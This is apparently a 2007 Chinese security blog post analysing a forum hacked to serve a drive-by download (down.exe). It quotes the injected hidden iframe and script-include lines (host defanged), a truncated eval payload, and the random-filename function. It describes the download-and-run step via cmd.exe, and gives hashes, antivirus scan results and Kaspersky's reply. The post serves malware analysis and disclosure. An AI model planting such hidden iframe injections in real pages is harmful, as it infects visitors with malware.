某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262-优快云博客

一篇关于某论坛被黑客挂载恶意软件down.exe的分析报告。该恶意软件被多种反病毒引擎检测为不同类型的威胁，包括Trojan.PWS.Maran.262等。文章详细记录了恶意软件的传播方式及被感染论坛的技术细节。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262

endurer 原创
2007-07-28 第2版补充 Kaspersky 的回复
2007-07-28 第1版

打开该论坛中偶常去的版面，瑞星提示有可疑文件下载运行。

用Google搜索，果然Google已经标出来了：
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=%E8%BF%98%E7%8F%A0%E5%8C%BA+%E6%97%A7%E9%9B%A8%E6%A5%BC%E6%B8%85%E9%A3%8E%E9%98%81&meta=

检查网页代码，被加入：
/---
＜iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1＞＜/iframe＞
---/

hxxp://i**.x***in**8.info/wm.htm 包含代码：
/---
＜script src=0614.js＞＜/script＞
---/

hxxp://i**.x***in**8.info/0614.js 内容为：
/---
eval（"/146/165/156/143/…(略)…/146/75/61/73/175"）
---/

经过2次解密，得到原始代码，功能是下载 down.exe，保存到%windir%下，文件名由自定义函数：
/---
function QK45u3（rm4mf）｛var m0qNW ＝ window［“Math”］［“random”］（）＊rm4mf;return Math［“round”］（m0qNW）＋‘.exe’；｝
---/
即***.exe，其中*为数字，接着通过cmd.exe /c 来运行。

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-28 15:2:29
修改时间 : 2007-7-28 15:2:29
访问时间 : 2007-7-28 15:3:29
大小 : 19602 字节 19.146 KB
MD5 : a329a121353d80b9871119788f7b14c7

nSPack 1.3 -＞ North Star/Liu Xing Ping

文件 down.exe 接收于 2007.07.28 09:14:12 (CET)
当前状态: 完成

反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2007.7.28.0	2007.07.27	Win-Trojan/Hupigon.Gen
AntiVir	7.4.0.50	2007.07.27	TR/Agent.19602
Authentium	4.93.8	2007.07.27	Possibly a new variant of W32/Threat-HLLIN-Slipper-based!Maximus
Avast	4.7.997.0	2007.07.27	Win32:Small-AMI
AVG	7.5.0.476	2007.07.27	Downloader.Generic5.ECA
BitDefender	7.2	2007.07.28	GenPack:Generic.Malware.WBdld.92022134
CAT-QuickHeal	9.00	2007.07.26	(Suspicious) - DNAScan
ClamAV	0.91	2007.07.28	-
DrWeb	4.33	2007.07.27	Trojan.PWS.Maran.262
eSafe	7.0.15.0	2007.07.24	suspicious Trojan/Worm
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.27	-
FileAdvisor	1	2007.07.28	-
Fortinet	2.91.0.0	2007.07.28	-
F-Prot	4.3.2.48	2007.07.27	W32/Threat-HLLIN-Slipper-based!Maximus
F-Secure	6.70.13030.0	2007.07.27	W32/Hupigon.gen67
Ikarus	T3.1.1.8	2007.07.27	Backdoor.Win32.Agent.ahj
Kaspersky	4.0.2.24	2007.07.28	-
McAfee	5085	2007.07.27	-
Microsoft	1.2704	2007.07.28	-
NOD32v2	2426	2007.07.27	a variant of Win32/TrojanDownloader.Delf.NSA
Norman	5.80.02	2007.07.27	W32/Hupigon.gen67
Panda	9.0.0.4	2007.07.28	Generic Trojan
Rising	19.33.42.00	2007.07.27	-
Prevx1	V2	2007.07.28	W32.MALWARE.GEN
Sophos	4.19.0	2007.07.26	Mal/Packer
Sunbelt	2.2.907.0	2007.07.28	VIPRE.Suspicious
Symantec	10	2007.07.28	-
TheHacker	6.1.7.155	2007.07.28	-
VBA32	3.12.2.1	2007.07.27	MalwareScope.Trojan-PSW.Game.14
VirusBuster	4.3.26:9	2007.07.27	-
Webwasher-Gateway	6.0.1	2007.07.28	Trojan.Agent.19602

附加信息

File size: 19602 bytes

MD5: a329a121353d80b9871119788f7b14c7

SHA1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03

Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=CBB0E79992C2FA964C9000F9F5065B00EFB6D5A7

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

主　题：	RE:[KLAB-2516758]
发件人：	"" <newvirus@kaspersky.com> <script language="JavaScript" type="text/javascript"> <!-- var aAddAdress = document.getElementById("aAddAdress"); aAddAdress.href = document.guideform.guidelinks.options[5].value; var aDeleteAdress = document.getElementById("aDeleteAdress"); aDeleteAdress.href = document.guideform.guidelinks.options[4].value; document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[5]); document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[4]); //--> </script>	发送时间：2007-07-28 16:16:38

Hello.

Virus.Win32.AutoRun.z

New malicious software was found in the attached file.

It's detection will be included in the next update. Thank you for your help.

-----------------

Regards, Yury Nesmachny

Virus Analyst, Kaspersky Lab.